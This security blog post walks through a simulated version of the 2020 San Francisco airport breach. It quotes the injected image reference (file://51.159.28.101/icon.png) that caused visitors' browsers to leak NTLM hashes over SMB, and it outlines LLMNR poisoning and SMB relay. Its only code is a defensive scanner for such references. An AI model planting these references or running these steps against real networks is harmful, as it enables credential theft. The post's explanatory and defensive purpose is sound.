On April 7, 2020, the San Francisco International Airport (SFO) released a notice confirming that two of its websites, SFOConnect.com and SFOConstruction.com, were targets of a cyberattack in March 2020. The attack has been attributed to a hacker group that was attempting to steal the Windows logins of the airport’s employees.

When we hear news about cyberattacks, a few typical, yet crucial questions spring to mind: How did the attackers perform the cyberattack? Why did the airport authorities take so long to discover the breach? Could the breach have been prevented? And most importantly, am I at risk too?

The attack involved the use of the Server Message Block (SMB) protocol, a client-server communication protocol used for sharing access to files, printers, and serial ports in a network. In order to acquire a deeper understanding and examine the possible reasons behind the breach, we took up the mammoth task of simulating the breach on our end.

STEP 1: INTRUSION

After hacking the SFO employee sites, attackers injected a small piece of JavaScript code on the website.

If you observe the highlighted region in the image above, you’ll notice that the src (source) attribute points to an image on a remote system (file://51.159.28.101/icon.png). As you have probably already realized, the code inserts an image into the website’s HTML.

STEP 2: SETTING UP A NETWORK SNIFFER ON THE ATTACKER’S SYSTEM

We now need to set up the attacker’s system, that is, the remote system from which the injected code tries to fetch the image. This system does not need to be domain-joined.

A network sniffer, a tool that captures any request coming from other hosts, must be installed on it next.

The above image shows a publicly available PowerShell script that poisons all Link-Local Multicast Name Resolution (LLMNR) requests.

We will examine LLMNR in detail in future blog posts, but for now, all you need to know is that LLMNR acts as a fallback to DNS: hosts use it to resolve a hostname when the DNS lookup fails. Below is a visual representation of the attack.

The above is an example of an SMB-relay attack.

STEP 3: DUMP VICTIM NTLM HASHES TO THE ATTACKER’S SYSTEM

  • \\Serv1 in the above representation is the PNG file injected into the website.

  • The victim user’s browser attempts to load the image from the attacker’s system via its UNC path (the FILE:// reference), which is fetched using the SMB protocol.

  • Thanks to the network sniffer, the attackers are now able to capture the victim’s NTLM hashes.
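The following scanner is an added example, not code from the original post or from the SFO investigation: it flags the kind of reference described in steps 1 and 3, an image or inline script on a web page whose source is a file:// URL or UNC path, which a Windows browser will try to fetch over SMB. The sample page is constructed; its file://51.159.28.101/icon.png reference mirrors the one shown in the post.

```python
import re
from html.parser import HTMLParser

# Attributes whose value a browser fetches automatically when rendering.
FETCH_ATTRS = {"src", "href", "data", "poster", "background"}
# file:// URLs (either slash style) or bare \\host\share UNC paths, as an
# attribute value or built dynamically inside inline JavaScript.
UNC_ATTR = re.compile(r"^\s*(file:|\\\\)", re.IGNORECASE)
UNC_IN_SCRIPT = re.compile(r"""file:[/\\]{2}[^'"\s]+""", re.IGNORECASE)


class UncReferenceScanner(HTMLParser):
    """Collect (tag, attribute, value) triples that would make a Windows
    browser open an SMB connection to the named host; a domain-joined
    client may then attempt NTLM authentication against it automatically."""

    def __init__(self):
        super().__init__()
        self.findings = []
        self.in_script = False

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self.in_script = True
        for name, value in attrs:
            if value and name.lower() in FETCH_ATTRS and UNC_ATTR.match(value):
                self.findings.append((tag, name, value.strip()))

    def handle_endtag(self, tag):
        if tag == "script":
            self.in_script = False

    def handle_data(self, data):
        if self.in_script:
            for match in UNC_IN_SCRIPT.finditer(data):
                self.findings.append(("script", "inline", match.group(0)))


def find_unc_references(html):
    """Return every file:// or UNC resource reference found in the page."""
    scanner = UncReferenceScanner()
    scanner.feed(html)
    scanner.close()
    return scanner.findings


# Constructed sample page: one legitimate asset plus an injected image tag
# and an injected script, modelled on the reference the post shows.
SAMPLE_HTML = """<html><body>
<img src="/static/logo.png" alt="logo">
<img src="file://51.159.28.101/icon.png" style="display:none">
<script>var i = new Image(); i.src = "file://51.159.28.101/icon.png";</script>
</body></html>"""
```

Running `find_unc_references` over served pages (or over a site's deployed templates) as part of integrity monitoring surfaces this injection pattern before a browser ever resolves the remote host.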

The prospect of being on the receiving end of one of these attacks is scary, but there are ways to prevent them. If you want to learn about the possible defense measures against SMB relay attacks, and also about various kinds of attacks on hybrid Active Directory, visit our presentation here.

If you require any further assistance, drop your questions in the comment section below, and I’d be more than happy to help!

NOTE: The attack outlined above is a similar concept to the San Francisco International Airport breach, but the actual tools used and the attack method may vary.